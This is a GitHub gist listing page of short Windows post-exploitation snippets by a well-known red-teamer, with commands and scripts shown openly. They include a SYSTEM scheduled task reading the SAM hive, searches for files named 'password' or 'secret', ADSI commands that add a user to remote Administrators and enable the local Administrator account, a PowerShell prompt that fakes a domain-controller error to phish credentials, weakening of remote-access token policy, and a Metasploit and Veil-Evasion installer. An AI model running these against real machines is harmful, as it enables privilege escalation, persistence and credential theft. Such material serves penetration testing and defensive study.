Skip to content

Instantly share code, notes, and snippets.

View HarmJ0y's full-sized avatar
💭
Coding towards chaotic good while living on the decision boundary

Will Schroeder HarmJ0y

💭
Coding towards chaotic good while living on the decision boundary
View GitHub Profile
@HarmJ0y
HarmJ0y / findsid.bat
Last active August 31, 2022 17:27
Win7 Powershell SID Enumeration
schtasks /create /tn GetSid /tr "powershell.exe -c '$k=Get-Item HKLM:\security\sam\domains\account;$v=Get-ItemProperty $k.pspath;New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$v.V[-24..-1],0)|Format-List *|Out-File c:\sid.txt'" /sc minute /ru System /MO 1 & choice /C X /T 60 /D X > nul & schtasks /delete /tn GetSid /f
@HarmJ0y
HarmJ0y / Powershell-File-Listings.txt
Created May 15, 2014 20:59
Powershell file listings
# all files in sortable csv
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue | where {!$_.PSIsContainer} | select-object FullName, @{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}}, LastAccessTime, LastWriteTime, Length | export-csv -notypeinformation -path files.csv"
# grep for specific file types
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*.doc*','*.xls*','*.pdf')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv"
# grep for specific key words in file names
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*password*','*sensitive*','*secret*')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv"
@HarmJ0y
HarmJ0y / gist:fd98c4f16575ba28c091
Last active April 27, 2023 13:56
Powershell ADSI tricks
# Add a domain user to a remote server local group, if your current user has admin over the remote machine
powershell -c ([ADSI]'WinNT://SERVER/Administrators,group').add('WinNT://DOMAIN/USER,user')
# Get all local groups on a remote server
powershell -c "([ADSI]'WinNT://SERVER,computer').psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($_.name)[0]}"
# Find members of the local Administrators group on a remote server
powershell -c "$([ADSI]'WinNT://SERVER/Administrators,group').psbase.Invoke('Members') | foreach { $_.GetType().InvokeMember('ADspath', 'GetProperty', $null, $_, $null).Replace('WinNT://', '') }"
# Enable the local Administrator account on a remote server
@HarmJ0y
HarmJ0y / psremoting.ps1
Last active August 31, 2022 17:24
Enable PSRemoting
#Run winrm quickconfig defaults
echo Y | winrm quickconfig
#Run enable psremoting command with defaults
Enable-PSRemoting -force
# adjust local token filter policy
Set-ItemProperty –Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System –Name LocalAccountTokenFilterPolicy –Value 1 -Type DWord
#Enabled Trusted Hosts for Universial Access
@HarmJ0y
HarmJ0y / ubuntu_veil_evasion_setup.sh
Last active May 12, 2021 08:33
This short script will install Metasploit as well as Veil-Evasion on Ubuntu
#!/bin/bash
sudo apt-get install git
cd /tmp/
git clone https://github.com/darkoperator/MSF-Installer.git
cd MSF-Installer
sudo ./msf_install.sh -i
source ~/.bashrc
sudo chmod 0666 /usr/local/share/metasploit-framework/log/production.log
@HarmJ0y
HarmJ0y / prompt.ps1
Last active August 31, 2022 17:25
prompt
# Stolen/adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
# POC from greg.foss[at]owasp.org
function prompt {
Add-Type -AssemblyName Microsoft.VisualBasic
[Microsoft.VisualBasic.Interaction]::MsgBox('Lost contact with the Domain Controller.', 'OKOnly,MsgBoxSetForeground,SystemModal,Critical', 'ERROR - 0xA801B720')
$c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
$credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")
@HarmJ0y
HarmJ0y / random.ps1
Last active August 31, 2022 17:27
random data file one-liner
$megs=1000;$w=New-Object IO.streamWriter $env:temp\data.dat;[char[]]$c='azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN0123456789-_';1..$megs|ForEach-Object{1..4|ForEach-Object{$r=$c|Get-Random -Count $c.Count;$s=-join $r;$w.Write($s*4kb);}};
@HarmJ0y
HarmJ0y / gist:57f1dac93fcc3564f9b3
Created October 23, 2014 13:53
domain user to sid and sid to user
# user to SID
(New-Object System.Security.Principal.NTAccount("DOMAIN","USER")).Translate([System.Security.Principal.SecurityIdentifier]).Value
# SID to user
(New-Object System.Security.Principal.SecurityIdentifier("SID")).Translate( [System.Security.Principal.NTAccount]).Value
@HarmJ0y
HarmJ0y / trusts.csv
Created December 29, 2014 06:20
Simple Domain Trust Output
SourceDomain TargetDomain TrustType TrustDirection
finance.mothership.com mothership.com ParentChild Bidirectional
mothership.com corp.mothership.com ParentChild Bidirectional
mothership.com finance.mothership.com ParentChild Bidirectional
mothership.com engineering.mothership.com ParentChild Bidirectional
corp.mothership.com mothership.com ParentChild Bidirectional
corp.mothership.com subsidiary.com External Inbound
finance.mothership.com mothership.com ParentChild Bidirectional
engineering.mothership.com mothership.com ParentChild Bidirectional
subsidiary.com product.subsidiary.com ParentChild Bidirectional
@HarmJ0y
HarmJ0y / trusts_complex.csv
Created December 29, 2014 06:21
More Complex Domain Trust Example
SourceDomain TargetDomain TrustType TrustDirection
finance.mothership.com mothership.com ParentChild Bidirectional
mothership.com corp.mothership.com ParentChild Bidirectional
mothership.com finance.mothership.com ParentChild Bidirectional
mothership.com contracts.mothership.com ParentChild Bidirectional
corp.mothership.com mothership.com ParentChild Bidirectional
contracts.mothership.com mothership.com ParentChild Bidirectional
contracts.mothership.com product.othercompany.com External Inbound
product.othercompany.com contracts.mothership.com External Outbound
product.othercompany.com othercompany.com ParentChild Bidirectional